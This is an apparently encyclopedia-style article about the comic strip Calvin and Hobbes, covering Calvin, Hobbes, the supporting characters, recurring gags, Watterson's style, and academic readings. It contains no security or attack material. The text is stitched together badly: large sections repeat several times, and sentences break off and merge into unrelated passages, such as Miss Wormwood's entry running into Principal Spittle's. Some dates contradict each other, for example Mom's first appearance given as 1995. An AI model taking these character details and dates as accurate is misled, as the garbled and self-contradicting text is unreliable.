Overall, Watterson's satirical essays serve to attack both sides, criticizing both the commercial mainstream and the artists who are supposed to be "outside" it Not long after he began drawing his "Dinosaurs In Rocket Ships" series, Calvin tells Hobbes:

    The hard part for us avant-garde post-modern artists is deciding whether or not to embrace commercialism Do we allow our work to be hyped and exploited by a market that's simply hungry for the next new thing Do we participate in a system that turns high art into low art so it's better suited for mass consumption Of course, when an artist goes commercial, he makes a mockery of his status as an outsider and free thinker He buys into the crass and shallow values art should transcend He trades the integrity of his art for riches and fame Oh, what the heck I'll do it

 Social criticisms

In addition to his criticisms of art and academia, Watterson often used the strip to comment on American culture and society With rare exception, the strip avoids reference to actual people or events Watterson's commentary is therefore necessarily generalized He expresses frustration with public decadence and apathy, with commercialism, and with the pandering nature of the mass media Calvin is often seen "glued" to the television, while his father speaks with the voice of ascetic virtue, struggling to impart his values to Calvin

Watterson's vehicle for criticism is often Hobbes, who comments on Calvin's unwholesome habits from a more cynical perspective He is more likely to make a wry observation than actually intervene; he may merely watch as Calvin inadvertently makes the point himself In one instance, Calvin tells Hobbes about a science fiction story he has read in which machines turn humans into zombie slaves Hobbes makes a comment about the irony of machines controlling people instead of the other way around; Calvin then exclaims, "I'll say Hey! What time is it My TV show is on!" and sprints back inside to watch it

A Sunday, 21 June 1992 strip discussing the Big Bang coined the term "Horrendous Space Kablooie" for the event, a term which has achieved some tongue-in-cheek popularity among the scientific community, particularly in informal discussion and often shortened to "the HSK"

 Visual distortions

On several occasions, Watterson drew strips with strange visual distortions: inverted colors, objects turning "neo-cubist", or fantasy environments with other unusual physical phenomena Only Calvin is able to perceive these alterations, which seem to illustrate both his own shifting point of view and a typical six-year-old's wild imagination

In the Tenth Anniversary Book, Watterson explains that some of these strips were metaphors for his own experiences, illustrating, for example, his conflicts with his syndicate: a 1989 Sunday strip, normally in color, was drawn almost entirely in an inverted monochrome Calvin is accused by his father of seeing issues "in black and white"—an accusation sometimes leveled at Watterson regarding his refusal to license the strip—to which Calvin, echoing Watterson's own retort, replies, "Sometimes that's the way things are!"

 Passage of time

When the strips were originally published, Calvin's settings were seasonally appropriate for the Northern Hemisphere Calvin would be seen building snowmen or sledding during the period from November through February or so, and outside activities such as water balloon fights would replace school from June through August Christmas and Halloween strips were run during those times of year

Although Watterson depicts several years' worth of holidays, school years, summer vacations, and camping trips, and characters are aware of multiple "current" years such as "'94 model toboggans," "Vote Dad in '88," the '90s as the new decade, etc Calvin is never shown to age, pass to second grade, nor have any birthday celebrations The only birthday ever shown was that of Susie Derkins Such temporal distortions are fairly common among comic strips, as with the children in Peanuts, who existed without aging for decades Likewise, the characters in Krazy Kat celebrate the New Year but never grow old, and young characters like Ignatz Mouse's offspring never seem to grow up These uses of a floating timeline are very unlike series such as Gasoline Alley, Doonesbury and until 2007 For Better or For Worse, in which the characters age each year with their reading audience, get married, and have children

While Calvin does not grow older in the strip, reference is made in two strips—from November 17 and 18, 1995 ten years since the strip's debut—to Calvin having once been two and three years old and now feeling that "a lifetime of experience has left 

 Academic response

In her book When Toys Come Alive, Lois Rostow Kuznets discusses Calvin and Hobbes in the context of other literature featuring living toys She argues that these toys are examples of transitional objects that mediate childhood experience and the adult world, where Hobbes serves both as a figure of Calvin's childish fantasy life and as an outlet for the expression of libidinous desires more associated with adults She cites, for example, a strip where Hobbes expresses a fantasy of playing "saxophone for an all-girl cabaret in New Orleans" as an example where Hobbes expresses a desire that is more sophisticated and adult than Calvin's frame of reference usually allows Kuznets also looks at Calvin's other fantasies, suggesting that they are a second tier of fantasies utilized in places like school where transitional objects such as Hobbes would not be socially acceptable

A second line of argument comes from Philip Sandifer, who uses Calvin and Hobbes as the main example for a reading of comic strips based on the psychoanalytic theories of Jacques Lacan He draws parallel between Hobbes's status as an imaginary friend and the Lacanian concept of the Imaginary, suggesting that a given comic strip is an attempt to construct a momentary and ephemeral present that will be dismantled by the punchline which he allies with the Lacanian Real, wiping the slate and allowing the process to begin again the next day He suggests that the strip takes place in an eternal present with no real reference to its past, which is erased each day with the punchline so that a new present can be constructed He also looks at the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imaginative, energetic, curious, intelligent, and often selfish six-year-old, whose last name is never mentioned in the strip Despite his low grades, Calvin has a wide vocabulary range that rivals that of an adult as well as an emerging philosophical mind:

        Calvin: "Dad, are you vicariously living through me in the hope that my accomplishments will validate your mediocre life and in some way compensate for all of the opportunities you botched"

        Calvin's father: "If I were, you can bet I'd be re-evaluating my strategy"

        Calvin later, to his mother: "Mom, Dad keeps insulting me"

He commonly wears his distinctive red-and-black striped shirt, black pants, magenta socks and white sneakers He is also a compulsive reader of comic books and has a tendency to order items marketed in comic books or on boxes of his favorite cereal, "Chocolate Frosted Sugar Bombs" Calvin chews gum regularly and subscribes to a magazine called Chewing Throughout the series, he is also revealed to be a "trial and error" sort of person Watterson has described Calvin thus:

     "Calvin is pretty easy to do because he is outgoing and rambunctious and there's not much of a filter between his brain and his mouth"
     "I guess he's a little too intelligent for his age The thing that I really enjoy about him is that he has no sense of restraint, he doesn't have the experience yet to know the things that you shouldn't do"

 Hobbes

    Main article: Hobbes Calvin and Hobbes

Hobbes

From everyone else's point of view, Hobbes is Calvin's stuffed tiger From Calvin's point of view, however, Hobbes is an anthropomorphic tiger, much larger than Calvin and full of independent attitudes and ideas But when the perspective shifts to any other character, readers again see merely a stuffed animal, usually seated at an off-kilter angle This is, of course, an odd dichotomy, and Watterson explains it thus:

    When Hobbes is a stuffed toy in one panel and alive in the next, I'm juxtaposing the "grown-up" version of reality with Calvin's version, and inviting the reader to decide which is truer

Hobbes' true nature is made more ambiguous by episodes that seem to attribute real-life consequences to Hobbes's actions One example is his habit of pouncing on Calvin the moment he arrives home from school, an act which always leaves Calvin with bruises and scrapes that are evident to other characters In another incident, Hobbes manages to tie Calvin to a chair in such a way that Calvin's father is unable to understand how he could have done it himself Yet another incident features Hobbes leaving Calvin hanging by the seat of his pants from a tree branch above Calvin's head

Hobbes is named after the 17th-century philosopher Thomas Hobbes, who had what Watterson described as "a dim view of human nature"

Although the first strips clearly show Calvin capturing Hobbes by means of a snare with tuna fish sandwich as the bait, a later comic August 1, 1989 seems to imply that Hobbes is, in fact, older than Calvin, and has been around his whole life Watterson eventually decided that it was not important to establish how Calvin and Hobbes had first met

 Supporting characters

    Main article: Secondary characters in Calvin and Hobbes

 Calvin's family
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other

Dad's first appearance: November 26, 1985 Mom's last appearance: December 21, 1995

Calvin's mother and father are for the most part typical Middle American middle-class parents Like many other characters in the strip, their relatively down-to-earth and sensible attitudes serve primarily as a foil for Calvin's outlandish behavior At the beginning of the strip, Watterson says some fans were angered by the way Calvin's parents thought of Calvin his father has remarked that he would have preferred a dog instead They are not above the occasional cruelty: his mother provided him with a cigarette to teach him a lesson, and his father often tells him outrageous lies when asked a straight question Calvin's father is a patent attorney; his mother is a stay-at-home mom Both parents go through the entire strip unnamed, except as "Mom" and "Dad," or such nicknames as "hon" and "dear" when referring to each other Watterson has never given Calvin's parents names "because as far as the strip is concerned, they are important only as Calvin's mom and dad" This ended up being somewhat problematic when Calvin's Uncle Max was in the strip for a week and could not refer to the parents by name It was one of the main reasons that Max never reappeared


First appearance: December 5, 1985 Last appearance: December 16, 1995

Susie Derkins, the only important character with both a given name and a family name, is a classmate of Calvin's who lives in his neighborhood Named for the pet beagle of Watterson's wife's family, she first appeared early in the strip as a new student in Calvin's class In contrast with Calvin, she is polite and diligent in her studies, and her imagination usually seems mild-mannered and civilized, consisting of stereotypical young girl games such as playing house or having tea parties with her stuffed animals Though both of them hate to admit it, Calvin and Susie have quite a bit in common For example, Susie is shown on occasion with a stuffed rabbit dubbed "Mr Bun," and Calvin, of course, has Hobbes Susie also has a mischievous streak, which can be seen when she subverts Calvin's attempts to cheat on school tests by feeding him incorrect answers Watterson admits that Calvin and Susie have a bit of a nascent crush on each other, and that Susie is inspired by the type of woman that he himself finds attractive and eventually married Her relationship with Calvin, though, is frequently conflicted, and never really becomes sorted out

 Miss Wormwood
Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, the only person Calvin truly fears She does not hesitate to play as dirty as he does Calvin and Rosalyn usually do not get along, except in one case where she plays "Calvinball" with him in exchange for him doing his homework Rosalyn's boyfriend, Charlie, never appears in the strip but calls her occasionally while she babysits Originally she was created as a nameless, one-shot character with no plan for her to appear again; however, Watterson decided he wanted to retain her unique ability to intimidate Calvin, which ultimately led to many more appearances

 Moe
Moe, a bully at Calvin's school

First appearance: January 30, 1986 Last appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons Those Sunday strips were never reprinted in color until the Complete collection was finally published in 2005 Every book since Snow Goons has been printed in a larger format with Sundays in color and weekday and Saturday strips larger than they appeared in most newspapers Watterson also claims he named the books the "Essential, Authoritative, and Indispensable" because as he says in The Calvin and Hobbes Tenth Anniversary Book, the books are "obviously none of these things"

Remaining books do contain some additional content; for instance, The Calvin and Hobbes Lazy Sunday Book contains a long watercolor Spaceman Spiff epic not seen elsewhere until Complete, and The Calvin and Hobbes Tenth Anniversary Book" that he liked the fact that his strip was a "low-tech, one-man operation," and took great pride in the fact that he drew every line and wrote every word on his own

Except for the books, two 16-month calendars 1988–1989 and 1989–1990, the textbook Teaching with Calvin and Hobbes,

 Style and influences

Calvin and Hobbes strips are characterized by sparse but careful craftsmanship, intelligent humor, poignant observations, witty social and political commentary, and well-developed characters Precedents to Calvin's fantasy world can be found in Crockett Johnson's Barnaby, Charles M Schulz's Peanuts, Percy Crosby's Skippy, Berkeley Breathed's Bloom County, and George Herriman's Krazy Kat, while Watterson's use of comics as sociopolitical commentary reaches back to Walt Kelly's Pogo and Quino's Mafalda Schulz and Kelly, in particular, influenced Watterson's outlook on comics during his formative years

In initial strips, the drawings have a more cartoony, flat, crude, Peanuts-like look; in the recent strips, the drawings are three-dimensional Notable elements of Watterson's artistic style are his characters' diverse and often exaggerated expressions particularly those of Calvin, elaborate and bizarre backgrounds for Calvin's flights of imagination, well-captured kinetics, and frequent visual jokes and metaphors In the later years of the strip, with more space available for his use, Watterson experimented more freely with different panel layouts, art styles, stories without dialogue, and greater use of whitespace He also made a point of not showing certain things explicitly: the "Noodle Incident" and the children's book Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, Watterson had 125 colors, as well as the ability to fade the colors into each other

 Art and academia

Watterson used the strip to criticize the artistic world, principally through Calvin's unconventional creations of snowmen but also through other expressions of childhood art When Miss Wormwood complains that he is wasting class time drawing incomprehensible things a Stegosaurus in a rocket ship, for example, Calvin proclaims himself "on the cutting edge of the avant-garde" He begins exploring the medium of snow when a warm day melts his snowman His next sculpture "speaks to the horror of our own mortality, inviting the viewer to contemplate the evanescence of life" In further strips, Calvin's creative instincts diversify to include sidewalk drawings or as he terms them, examples of "suburban postmodernism"

Watterson also lampooned the academic world In one example, Calvin writes a "revisionist autobiography", recruiting Hobbes to take pictures of him doing stereotypical kid activities like playing sports in order to make him seem more well-adjusted In another strip, he carefully crafts an "artist's statement," claiming that such essays convey more messages than artworks themselves ever do Hobbes blandly notes "You misspelled Weltanschauung" He indulges in what Watterson calls "pop psychobabble" to justify his destructive rampages and shift blame to his parents, citing "toxic codependency" In one instance, he pens a book report based on the theory that the purpose of academic scholarship is to "inflate weak ideas, obscure poor reasoning, and inhibit clarity," entitled The Dynamics of Interbeing and Monological Imperatives in Dick and Jane: A Study in Psychic Transrelational Gender Modes Displaying his creation to Hobbes, he remarks, "Academia, here I come!" Watterson explains that he adapted this jargon and similar examples from several other strips from an actual book of art criticism

Overall, Watterson's satirical essays serve to attack both sides, criticizing both the commercial mainstream and the artists who are supposed to be "outside" it Not long after he began drawing his "Dinosaurs In Rocket Ships" series, Calvin tells Hobbes about a science fiction story he has read in which machines turn humans into zombie slaves Hobbes makes a comment about the irony of machines controlling people instead of the other way around; Calvin then exclaims, "I'll say Hey! What time is it My TV show is on!" and sprints back inside to watch it

A Sunday, 21 June 1992 strip discussing the Big Bang coined the term "Horrendous Space Kablooie" for the event, a term which has achieved some tongue-in-cheek popularity among the scientific community, particularly in informal discussion and often shortened to "the HSK"

 Visual distortions

On several occasions, Watterson drew strips with strange visual distortions: inverted colors, objects turning "neo-cubist", or fantasy environments with other unusual physical phenomena Only Calvin is able to perceive these alterations, which seem to illustrate both his own shifting point of view and a typical six-year-old's wild imagination

In the Tenth Anniversary Book, Watterson explains that some of these strips were metaphors for his own experiences, illustrating, for example, his conflicts with his syndicate: a 1989 Sunday strip, normally in color, was drawn almost entirely in an inverted monochrome Calvin is accused by his father of seeing issues "in black and white"—an accusation sometimes leveled at Watterson regarding his refusal to license the strip—to which Calvin, echoing Watterson's own retort, replies, "Sometimes that's the way things are!"

 Passage of time

When the strips were originally published, Calvin's settings were seasonally appropriate for the Northern Hemisphere Calvin would be seen building snowmen or sledding during the period from November through February or so, and outside activities such as water balloon fights would replace school from June through August Christmas and Halloween strips were run during those times of year

Although Watterson depicts several years' worth of holidays, school years, summer vacations, and camping trips, and characters are aware of multiple "current" years such as "'94 model toboggans," "Vote Dad in '88," the '90s as the new decade, etc Calvin is never shown to age, pass to second grade, nor have any birthday celebrations The only birthday ever shown was that of Susie Derkins Such temporal distortions are fairly common among comic strips, as with the children in Peanuts, who existed without aging for decades Likewise, the characters in Krazy Kat celebrate the New Year but never grow old, and young characters like Ignatz Mouse's offspring never seem to grow up These uses of a floating timeline are very unlike series such as Gasoline Alley, Doonesbury and until 2007 For Better or For Worse, in which the characters age each year with their reading audience, get married, and have children

While Calvin does not grow older in the strip, reference is made in two strips—from November 17 and 18, 1995 ten years since the strip's debut—to Calvin having once been two and three years old and now feeling that "a lifetime of experience has left 

 Academic response

In her book When Toys Come Alive, Lois Rostow Kuznets discusses Calvin and Hobbes in the context of other literature featuring living toys She argues that these toys are examples of transitional objects that mediate childhood experience and the adult world, where Hobbes serves both as a figure of Calvin's childish fantasy life and as an outlet for the expression of libidinous desires more associated with adults She cites, for example, a strip where Hobbes expresses a fantasy of playing "saxophone for an all-girl cabaret in New Orleans" as an example where Hobbes expresses a desire that is more sophisticated and adult than Calvin's frame of reference usually allows Kuznets also looks at Calvin's other fantasies, suggesting that they are a second tier of fantasies utilized in places like school where transitional objects such as Hobbes would not be socially acceptable

A second line of argument comes from Philip Sandifer, who uses Calvin and Hobbes as the main example for a reading of comic strips based on the psychoanalytic theories of Jacques Lacan He draws parallel between Hobbes's status as an imaginary friend and the Lacanian concept of the Imaginary, suggesting that a given comic strip is an attempt to construct a momentary and ephemeral present that will be dismantled by the punchline which he allies with the Lacanian Real, wiping the slate and allowing the process to begin again the next day He suggests that the strip takes place in an eternal present with no real reference to its past, which is erased each day with the punchline so that a new present can be constructed He also looks at the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imaginative, energetic, curious, intelligent, and often selfish six-year-old, whose last name is never mentioned in the strip Despite his low grades, Calvin has a wide vocabulary range that rivals that of an adult as well as an emerging philosophical mind:

        Calvin: "Dad, are you vicariously living through me in the hope that my accomplishments will validate your mediocre life and in some way compensate for all of the opportunities you botched"

        Calvin's father: "If I were, you can bet I'd be re-evaluating my strategy"

        Calvin later, to his mother: "Mom, Dad keeps insulting me"

He commonly wears his distinctive red-and-black striped shirt, black pants, magenta socks and white sneakers He is also a compulsive reader of comic books and has a tendency to order items marketed in comic books or on boxes of his favorite cereal, "Chocolate Frosted Sugar Bombs" Calvin chews gum regularly and subscribes to a magazine called Chewing Throughout the series, he is also revealed to be a "trial and error" sort of person Watterson has described Calvin thus:

     "Calvin is pretty easy to do because he is outgoing and rambunctious and there's not much of a filter between his brain and his mouth"
     "I guess he's a little too intelligent for his age The thing that I really enjoy about him is that he has no sense of restraint, he doesn't have the experience yet to know the things that you shouldn't do"

 Hobbes

    Main article: Hobbes Calvin and Hobbes

Hobbes

From everyone else's point of view, Hobbes is Calvin's stuffed tiger From Calvin's point of view, however, Hobbes is an anthropomorphic tiger, much larger than Calvin and full of independent attitudes and ideas But when the perspective shifts to any other character, readers again see merely a stuffed animal, usually seated at an off-kilter angle This is, of course, an odd dichotomy, and Watterson explains it thus:

    When Hobbes is a stuffed toy in one panel and alive in the next, I'm juxtaposing the "grown-up" version of reality with Calvin's version, and inviting the reader to decide which is truer

Hobbes' true nature is made more ambiguous by episodes that seem to attribute real-life consequences to Hobbes's actions One example is his habit of pouncing on Calvin the moment he arrives home from school, an act which always leaves Calvin with bruises and scrapes that are evident to other characters In another incident, Hobbes manages to tie Calvin to a chair in such a way that Calvin's father is unable to understand how he could have done it himself Yet another incident features Hobbes leaving Calvin hanging by the seat of his pants from a tree branch above Calvin's head

Hobbes is named after the 17th-century philosopher Thomas Hobbes, who had what Watterson described as "a dim view of human nature"

Although the first strips clearly show Calvin capturing Hobbes by means of a snare with tuna fish sandwich as the bait, a later comic August 1, 1989 seems to imply that Hobbes is, in fact, older than Calvin, and has been around his whole life Watterson eventually decided that it was not important to establish how Calvin and Hobbes had first met

 Supporting characters

    Main article: Secondary characters in Calvin and Hobbes

 Calvin's family
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other

Dad's first appearance: November 18, 1985 Dad's last appearance: December 3, 1995

Mom's first appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish behavior At the beginning of the strip, Watterson says some fans were angered by the way Calvin's parents thought of Calvin his father has remarked that he would have preferred a dog instead They are not above the occasional cruelty: his mother provided him with a cigarette to teach him a lesson, and his father often tells him outrageous lies when asked a straight question Calvin's father is a patent attorney; his mother is a stay-at-home mom Both parents go through the entire strip unnamed, except as "Mom" and "Dad," or such nicknames as "hon" and "dear" when referring to each other Watterson has never given Calvin's parents names "because as far as the strip is concerned, they are important only as Calvin's mom and dad" This ended up being somewhat problematic when Calvin's Uncle Max was in the strip for a week and could not refer to the parents by name It was one of the main reasons that Max never reappeared


First appearance: December 5, 1985 Last appearance: December 5, 1985 Last appearance: December 16, 1995

Susie Derkins, the only important character with both a given name and a family name, is a classmate of Calvin's who lives in his neighborhood Named for the pet beagle of Watterson's wife's family, she first appeared early in the strip as a new student in Calvin's class In contrast with Calvin, she is polite and diligent in her studies, and her imagination usually seems mild-mannered and civilized, consisting of stereotypical young girl games such as playing house or having tea parties with her stuffed animals Though both of them hate to admit it, Calvin and Susie have quite a bit in common For example, Susie is shown on occasion with a stuffed rabbit dubbed "Mr Bun," and Calvin, of course, has Hobbes Susie also has a mischievous streak, which can be seen when she subverts Calvin's attempts to cheat on school tests by feeding him incorrect answers Watterson admits that Calvin and Susie have a bit of a nascent crush on each other, and that Susie is inspired by the type of woman that he himself finds attractive and eventually married Her relationship with Calvin, though, is frequently conflicted, and never really becomes sorted out

 Miss Wormwood
Miss Wormwood, Calvin's teacher
Miss Wormwood, Calvin's teacher
Miss Wormwood, Calvin's teacher

First appearance: November 21, 1985 Last appearance: October 30, 1995 unseen speaking appearance on November 6, 1995

Miss Wormwood is Calvin's world-weary teacher, named after the apprentice devil in C S Lewis's The Screwtape Letters She perpetually wears polka-dotted dresses, and serves, like others, as a foil to Calvin's mischief Throughout the strip's run, various jokes hint that Miss Wormwood is waiting to retire, takes a lot of medication, and is a heavy smoker and drinker Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: May 15, 1986 Last appearance: September 16, 1995

Rosalyn is a teenage high school senior and Calvin's official babysitter whenever Calvin's parents need a night out She is also his swimming instructor in one early sequence of strips She is the only babysitter able to tolerate Calvin's antics, which she uses to demand raises and advances from Calvin's desperate parents She is also, according to Watterson, the only person Calvin truly fears She does not hesitate to play as dirty as he does Calvin and Rosalyn usually do not get along, except in one case where she plays "Calvinball" with him in exchange for him doing his homework Rosalyn's boyfriend, Charlie, never appears in the strip but calls her occasionally while she babysits Originally she was created as a nameless, one-shot character with no plan for her to appear again; however, Watterson decided he wanted to retain her unique ability to intimidate Calvin, which ultimately led to many more appearances

 Moe
Moe, a bully at Calvin's school
Moe, a bully at Calvin's school

First appearance: January 30, 1986 Last appearance: November 20, 1995

